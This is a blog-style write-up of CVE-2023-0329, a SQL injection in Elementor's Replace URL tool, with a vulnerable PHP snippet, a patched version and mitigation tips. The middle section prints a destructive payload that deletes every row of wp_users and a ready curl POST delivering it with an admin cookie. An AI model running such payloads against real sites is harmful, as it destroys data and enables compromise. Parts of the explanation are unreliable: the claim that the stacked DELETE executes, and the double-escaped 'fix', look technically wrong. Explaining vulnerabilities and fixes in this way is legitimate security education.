CVE-2023-0329 - How a Simple SQL Injection in Elementor's Replace URL Tool Imperiled Sites (PoC Included!)

If you run a WordPress site, chances are you’ve at least heard of Elementor — it’s the go-to plugin for easy, drag-and-drop website building. But in early 2023, researchers uncovered a serious flaw: CVE-2023-0329. This SQL injection vulnerability lurked in the “Replace URL” tool, letting an authenticated administrator do things they shouldn’t, like running arbitrary SQL commands on the site’s database.

In this exclusive long-read, we’ll break down what went wrong, explore exploit code, and see how to stay safe if you still use Elementor.

What is CVE-2023-0329?

CVE-2023-0329 is a vulnerability in Elementor Website Builder (before version 3.12.2). It allows an attacker with administrator access to exploit improper input handling in the Replace URL tool, resulting in SQL injection.

Vulnerable code: Fails to sanitize and escape the Replace URL parameter.

- Impact: Any administrator, or anyone who can masquerade as one, could execute SQL commands — extract sensitive data, modify the database, or even bring down your site.

> References:  
> WPScan Advisory  
> NVD - CVE-2023-0329  
> Elementor Changelog

How Does It Happen?

The Replace URL tool lets admins swap out URLs in the database — handy for moving domains, but also a risk if you don’t treat user input with suspicion. Here’s roughly how the function works (simplified):

// Vulnerable snippet (simplified)
global $wpdb;
$old_url = $_POST['old_url'];
$new_url = $_POST['new_url'];

// Direct use - BAD!
$query = "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, '$old_url', '$new_url')";
$wpdb->query($query);

See the problem? The variables are inserted directly into SQL, with no sanitization or escaping. That lets a malicious admin sneak SQL into those variables.

Attacker role: Must be logged in as an Administrator.

- Why still dangerous? Some plugin or theme flaws let attackers escalate privileges to admin. Or, in multi-admin sites, an insider could turn evil.

Let’s say an attacker submits the following as the old_url parameter

'; DELETE FROM wp_users WHERE 1=1; --

When substituted into the SQL statement, it becomes

UPDATE wp_posts SET post_content = REPLACE(post_content, ''; DELETE FROM wp_users WHERE 1=1; --', '$new_url');

The SQL interpreter runs everything up to the semicolon, then executes the DELETE — wiping your entire user table!

Here’s a basic POST request exploit example (using curl)

curl -X POST -d "old_url=%27%3B+DELETE+FROM+wp_users+WHERE+1%3D1%3B+--&new_url=anything" \
  -b "your-admin-cookie-here" \
  https://example.com/wp-admin/admin-ajax.php?action=elementor_replace_url

Note: You’d need a valid session cookie for an administrator, but this is vanishingly easy for plugin or site admins.

Real-World Risks and Attack Scenarios

- Privilege Escalation Chains: If another bug lets someone create an admin account, chaining into CVE-2023-0329 means full site compromise.
- Internal Threat: In organizations with multiple admins (like agencies or hosting providers), a rogue insider could exfiltrate data or destroy content.
- Mass Exploitation: Attackers could automate privilege escalations with known bugs, install backdoors, or ransom/delete content.

How Was It Fixed?

Elementor patched this vulnerability in version 3.12.2, simply by cleaning up the way parameters are handled. The safe version escapes all inputs before inserting into SQL:

// Patched version
$old_url = esc_sql( sanitize_text_field( $_POST['old_url'] ) );
$new_url = esc_sql( sanitize_text_field( $_POST['new_url'] ) );
$query = $wpdb->prepare(
    "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, %s, %s)",
    $old_url,
    $new_url
);
$wpdb->query($query);

By using WordPress’s built-in functions, the risk of SQL injection is squashed.

Remove unnecessary administrator accounts.

- Limit plugin installation/update rights.

References

- WPScan Vulnerability Report
- Official Elementor Changelog
- National Vulnerability Database Entry

Final Thoughts

CVE-2023-0329 highlights how even trusted plugins can fall prey to classic bugs like SQL injection — and why WordPress admins should never delay updates. Even “admin-only” functions can be weaponized in the right attack scenario.

If you’re running Elementor, update now.  
Keep your site (and your users) safe!


*Exclusive for this post: If you found this useful, don’t keep it to yourself — send it to your dev team or WordPress admin friends, and keep your WordPress fortress secure!*

Timeline

Published on: 05/30/2023 08:15:00 UTC
Last modified on: 06/03/2023 04:18:00 UTC